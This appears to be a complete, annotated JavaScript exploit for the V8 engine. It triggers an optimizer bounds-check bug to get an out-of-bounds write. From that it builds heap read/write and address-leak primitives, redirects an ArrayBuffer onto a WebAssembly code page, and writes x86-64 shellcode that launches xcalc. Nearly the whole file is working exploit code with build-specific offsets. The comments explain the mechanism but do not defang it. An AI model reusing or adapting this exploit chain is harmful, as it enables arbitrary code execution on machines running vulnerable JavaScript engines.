// Scratch cell shared by ftoi/itof: one 8-byte buffer viewed both as a
// float64 and as two little-endian uint32 words. `u64_buf` is a Uint32Array
// despite its name. Note that `buf` is re-declared further down
// (`var buf = new ArrayBuffer(0x100)`); the two typed arrays keep referencing
// this original 8-byte buffer, so the helpers are unaffected by that.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

/**
 * Reinterpret the bit pattern of a float64 as an unsigned 64-bit BigInt
 * (low word from u64_buf[0], high word from u64_buf[1]; little-endian host).
 * @param {number} val
 * @returns {bigint}
 */
function ftoi(val) {
  f64_buf[0] = val;
  const lo = BigInt(u64_buf[0]);
  const hi = BigInt(u64_buf[1]);
  return (hi << 32n) | lo;
}

/**
 * Inverse of ftoi: build the float64 whose bits are the given 64-bit BigInt.
 * Bits above 64 are not meaningful (the high word goes through Number() and
 * is truncated on store); callers only ever pass 64-bit values.
 * @param {bigint} val
 * @returns {number}
 */
function itof(val) {
  const lo = val & 0xffffffffn;
  const hi = val >> 32n;
  u64_buf[0] = Number(lo);
  u64_buf[1] = Number(hi);
  return f64_buf[0];
}
/**
 * Log `s` immediately followed by `val` as a 0x-prefixed hex string.
 * `val` may be a Number or a BigInt (both support toString(16)). No separator
 * is inserted after `s`; callers include their own trailing space if wanted.
 * @param {string} s
 * @param {number|bigint} val
 */
function printhex(s, val) {
  const hex = val.toString(16);
  const line = s + '0x' + hex;
  console.log(line);
}
/**
 * Heap-pressure helper: allocate 100 x 1 MiB ArrayBuffers and drop them
 * immediately, which in practice nudges V8 into running a garbage
 * collection. Nothing guarantees a GC actually happens; the caller treats
 * this as best-effort.
 */
function gc() {
  let remaining = 100;
  while (remaining > 0) {
    void new ArrayBuffer(0x100000);
    remaining -= 1;
  }
}
  22.  
// Minimal WebAssembly module given as raw bytes ("\0asm", version 1). Reading
// the sections: one function type () -> i32 (bytes 96,0,1,127), one function,
// a memory with min 1 page, and an export section naming "memory"
// (109,101,109,111,114,121) and "main" (109,97,105,110). The function body is
// `i32.const 42; end` (bytes 65,42,11). Its only purpose is to make V8 emit
// native code for `main`: the script later locates that code page, overwrites
// it with shellcode, and calls f() so the injected bytes run.
// NOTE(review): this assumes the wasm code page is writable as well as
// executable in the targeted V8 build; it will not hold where JIT code is
// mapped write-protected.
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
// Exported function; called exactly once, at the very end, after its code
// has been patched.
var f = wasm_instance.exports.main;
  27.  
// Build one very large packed-double array. The sizes work out as:
//   0xff copies of a 0x40000-element array   = 0x3fc0000 elements
// + one array of 0x40000-4 = 0x3fffc elements
//   concat                                   -> 0x3fffffc elements (67108860)
// + splice appends 3 more                    -> 0x3ffffff elements (67108863)
// That final length is what `trigger` below is keyed to (it subtracts
// 0x3fffffd == 67108861). Presumably the point is to reach a length the
// optimizing compiler believes a backing store can never have, via the
// concat + splice path. Memory cost is ~512 MiB of doubles.
// (`array`, `args`, `giant_array` are implicit globals — sloppy-mode script.)
array = Array(0x40000).fill(1.1);
args = Array(0x100 - 1).fill(array);
args.push(Array(0x40000 - 4).fill(2.2));
giant_array = Array.prototype.concat.apply([], args);
giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
  33.  
// Float64 whose raw bits are 0x4848484800000001. `trigger` stores it out of
// bounds of a 2-element array, so these 8 bytes land on the object allocated
// right after it. Presumably the high dword 0x48484848 is meant to overwrite a
// Smi-tagged length field (Smi value 0x24242424, i.e. an enormous array
// length); which field it actually overlaps depends on this build's object
// layout — the length printed after the trigger is the check.
length_as_double = new Float64Array(new BigUint64Array([0x4848484800000001n]).buffer)[0];
/**
 * The bug trigger. With giant_array.length == 0x3ffffff the arithmetic is
 * fully determined: x = 0x3ffffff - 0x3fffffd = 2; max(2,0) = 2; 2*6 = 12;
 * 12-5 = 7; max(7,0) = 7. So the store below targets index 7 of a 2-element
 * double array. Before optimization that is an ordinary store that grows the
 * array; once the function is optimized it becomes an 8-byte out-of-bounds
 * write into whatever sits after corrupting_array's element storage — here
 * the `corrupted_array` allocated immediately afterwards.
 *
 * NOTE(review): the Math.max / multiply / subtract chain is not noise — it is
 * the exact shape the optimizing compiler's range analysis reasons about.
 * Presumably it assumes array.length can never exceed 0x3fffffd, concludes x
 * is always 0, and drops the bounds check on the store. Do not "simplify" or
 * reorder these statements; the trigger depends on them verbatim.
 *
 * @param {number[]} array  giant_array
 * @returns {Array} [the array that was written past, the victim array]
 */
function trigger(array) {
  var x = array.length;
  x -= 67108861;
  x = Math.max(x, 0);
  x *= 6;
  x -= 5;
  x = Math.max(x, 0);
  let corrupting_array = [0.1, 0.1];
  let corrupted_array = [0.1];
  corrupting_array[x] = length_as_double;
  return [corrupting_array, corrupted_array];
}
  47.  
// Warm-up: call trigger ~30k times so the optimizing JIT compiles it (with
// the presumed wrong assumption about giant_array.length). The pair actually
// used is the one produced by the call after gc().
for (let i = 0; i < 30000; ++i) {
  trigger(giant_array);
}
gc();

// [1] is the 1-element array whose neighbouring bytes were just overwritten
// by the optimized trigger. Its .length is printed below; from here on it is
// the out-of-bounds read/write primitive over the heap that follows it.
var corrupted_array = trigger(giant_array)[1];
var idk = [1.1]; // never read; possibly just a spacer allocation
// Marker objects allocated right after the corrupted array:
//  - target_array : three recognisable double patterns (0x1337.., 0x1338.., 0x1339..)
//  - target_array2: the single marker 0x4747474747474747 that the heap scan
//                   below searches for, to get a known anchor in
//                   corrupted_array's index space
//  - object_array : holds object references rather than doubles; its map is
//                   swapped later so those references can be read as raw bits
//                   (see addrof)
var target_array = [itof(0x1337133713371337n),itof(0x1338133813381338n),itof(0x1339133913391339n)]
var target_array2 = [itof(0x4747474747474747n)];
var object_array = [target_array,target_array2,{"A":1}];

console.log("Now");
/**
 * Debug-only stall: prints "FUCK" 0x2ffff times. Every call site in this
 * script is commented out; it appears to be a crude way to slow the script
 * down / flush output while a debugger is attached. Kept with identical
 * behaviour.
 */
function debug() {
  let remaining = 0x30000 - 1;
  while (remaining > 0) {
    console.log("FUCK");
    remaining -= 1;
  }
}
//debug();
// Sanity print: if the OOB store landed where intended this is a huge value
// (the Smi length derived from the 0x48484848 dword), not 1.
console.log('corrupted array length: ' + corrupted_array.length.toString(16));

//DebugPrint(target_array);
//DebugPrint(target_array2);
//DebugPrint(object_array);

// Byte ranges to scan for the 0x4747474747474747 marker. These are NOT
// absolute addresses: corrupted_array[i] reads the i-th 8-byte slot relative
// to its own element storage, so every value here is an offset from that
// storage. Hard-coded for one particular build / heap layout (presumably
// read off the commented-out DebugPrint output in d8).
var search_space = [[0x8080000,0x0818d000],[0x81c0000,0x81c1000],[0x08200000,0x08280000],[0x083c0000,0x086c1000],[0x08700000,0x08900000],[0x08ac0000,0x090c1000],[0x09100000,0x29101000],[0x29140000,0x59141000],[0x59180000,0x599c0000]];

////DebugPrint(corrupted_array);

var index = -1;
var d = 1; // "found" flag; 0 once the marker is located, used to leave the outer loop

// NOTE(review): only ranges 0..5 are scanned (`j <= 5`); the last three
// entries of search_space are never visited. Unclear whether that is
// intentional. A labelled `break` on the outer loop would replace the `d` flag.
for(var j = 0; j <= 5; j++) {
  for(var i = search_space[j][0]/8; i < (search_space[j][1]/8) - 1; i++ ) {
    if(ftoi(corrupted_array[i]) == 0x4747474747474747n) {
      index = i;
      d = 0;
      break;
    }
  }
  if(d == 0) {
    break;
  }

}
////DebugPrint(target_array);
////DebugPrint(target_array2);
////DebugPrint(object_array);
////DebugPrint(fuck);

// No anchor means nothing below can be trusted; bail out rather than write
// through garbage offsets.
if(index == -1) {
  throw new Error("Not found");
}

// Byte offset of the marker slot relative to corrupted_array's elements.
printhex("Found at",index*8);

////DebugPrint(target_array);
////DebugPrint(target_array2);
////DebugPrint(object_array);
////DebugPrint(fuck);

// Everything below is relative to the marker slot `index`. The offsets are
// build-specific; from how addrof uses them they evidently mean:
//   +0x58         : the 8-byte slot holding object_array's (map, properties)
//                   compressed words
//   -0x160/-0x158 : two adjacent slots straddling a packed-double array's
//                   (map, properties) words — map in the high dword of the
//                   first, properties in the low dword of the second.
// Nothing here verifies those assumptions; wrong offsets corrupt the heap.
var object_array_map = ftoi(corrupted_array[index + (0x58/8)]);
printhex('object array map: ',object_array_map);
var double_array_map = ftoi(corrupted_array[index - (0x160/8)]);
var double_array_properties = ftoi(corrupted_array[index - (0x158/8)])&0xffffffffn;
// Pack (map in the low dword, properties in the high dword) into one 8-byte
// value so it can be written over object_array's (map, properties) pair in a
// single OOB store — see addrof.
var double_map = (double_array_properties<<32n) + (double_array_map>>32n)
  113.  
/**
 * Leak the compressed, tagged address of `object`.
 *
 * Mechanism: park `object` in object_array[0], then overwrite object_array's
 * (map, properties) slot (located at `index + 0x58`) with `double_map` so the
 * engine treats its backing store as raw doubles. Reading object_array[0] then
 * yields element bits instead of a dereferenced object. The original map is
 * put back immediately afterwards.
 *
 * The returned BigInt is the full 8-byte slot: the compressed pointer to
 * `object` is in the low 32 bits (callers mask with 0xffffffff and subtract
 * the tag bit); the high 32 bits are presumably whatever occupies the next
 * element slot and must be ignored.
 *
 * NOTE(review): nothing prevents a GC between the two map writes; if one runs
 * while the map is wrong the heap is left inconsistent. Best-effort only.
 *
 * @param {object} object
 * @returns {bigint}
 */
function addrof(object) {
  object_array[0] = object;
  corrupted_array[index+(0x58/8)] = itof(double_map);
  var address = ftoi(object_array[0]);
  corrupted_array[index+(0x58/8)] = itof(object_array_map);
  return address;
}
  121.  
//debug();
// NOTE(review): operator-precedence trap. `-` binds tighter than `&`, so this
// evaluates as addrof(...) & (0xffffffffn - 1n) == addrof(...) & 0xfffffffen,
// not the (addrof(...) & 0xffffffffn) - 1n form used for `buff_addr` below. It
// happens to give the same value only because the tagged pointer's low bit is
// 1 (clearing it equals subtracting 1). Intended form:
//   var w_instance = (addrof(wasm_instance) & 0xffffffffn) - 1n;
var w_instance = addrof(wasm_instance)&0xffffffffn - 1n;
printhex("HMM: ",w_instance);

// Read the 8-byte value at w_instance+0x60. corrupted_array can only read
// 8-byte slots at 8-byte-aligned offsets, so the branch depends on the
// object's alignment: if the field is 8-aligned it is one read, otherwise it
// straddles two slots and the halves are stitched back together. The field
// is assumed (not verified) to be the instance's executable code pointer —
// presumably where `f()` jumps into. The +0x60/+0x64 offsets are
// build-specific.
if(((w_instance&0xfn) == 0x8n) || ((w_instance&0xfn) == 0x0n)) {
  var rwx_index = (w_instance + 0x60n);
  var rwx_page = ftoi(corrupted_array[rwx_index/8n]);
  printhex("PAGE: ",rwx_page);
}
else {
  var rwx_index = (w_instance+0x64n) ;
  var rwx_upper = (ftoi(corrupted_array[rwx_index/8n])&0xffffffffn)<<32n;
  var rwx_lower = (ftoi(corrupted_array[(rwx_index-8n)/8n])&0xffffffff00000000n)>>32n;
  var rwx_page = rwx_upper + rwx_lower;
  printhex("PAGE: ",rwx_page);

}

// `print` is a d8 builtin; everywhere else this script uses console.log. In
// Node this line throws ReferenceError; in a browser `print` is window.print.
print("writing shellcode: ");
//Shellcode

// Re-declares the global `buf` from the top of the file. Harmless here
// because f64_buf/u64_buf captured the original 8-byte buffer, but any later
// code expecting `buf` to be the scratch buffer would be wrong.
var buf = new ArrayBuffer(0x100);
var dataview = new DataView(buf);
var buff_addr = (addrof(buf)&0xffffffffn)-1n;
printhex("00: ",buff_addr);
////DebugPrint(buf);
// Redirect the ArrayBuffer's backing-store pointer at the code page so the
// DataView writes below land in executable memory. Same alignment split as
// above; in both branches the 8-byte pointer field ends up at buff_addr+0xc:
//  - first branch (object 8-aligned): the field straddles two slots. Its low
//    dword is written via the high half of slot +0x8 (bytes +0xc..+0x10) and
//    its high dword via the low half of slot +0x10 (bytes +0x10..+0x14). The
//    `backing_store` value printed here (+0x8) is the slot, not the field, and
//    `lower_half`/`upper_half` name the slots in the opposite order of the
//    pointer halves they receive.
//    NOTE(review): this branch also zeroes bytes +0x8..+0xc and writes
//    0x41414141 over bytes +0x14..+0x18 as a side effect; whatever those
//    fields are in this build is assumed not to matter for setUint32.
//  - second branch (object at +4 mod 8): the field is 8-aligned and is
//    written in one slot at +0xc.
if ((buff_addr & 0xfn) == 0n || (buff_addr & 0xfn) == 8n) {
  backing_store = buff_addr + 0x8n;
  lower_half = buff_addr + 0x10n;
  upper_half = buff_addr + 0x8n;
  corrupted_array[lower_half/8n] = itof(0x4141414100000000n+((rwx_page&0xffffffff00000000n)>>32n));
  corrupted_array[upper_half/8n] = itof((rwx_page&0xffffffffn)<<32n);
  print("FUCK");
}
else {
  backing_store = buff_addr + 0xcn;
  corrupted_array[backing_store/8n] = itof(rwx_page);
}
printhex("Backing store: ",backing_store);
// Payload as little-endian 32-bit words, written with setUint32(..., true).
// Decoded by eye (not verified by execution): the ASCII in these words spells
// "/usr/bin", "/xcalc" and "DISPLAY=:0", and the tail is `mov eax, 0x3b` /
// `syscall` — i.e. an x86-64 Linux execve of xcalc, a proof-of-concept
// "pop a calculator" payload. Leading 0x90 bytes are a NOP sled.
var shellcode = [0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
for (var i = 0; i < shellcode.length; i++) {
  dataview.setUint32(4*i,shellcode[i],true);
}
// Transfer control: the wasm export now begins with the bytes just written.
f();
////SystemBreak();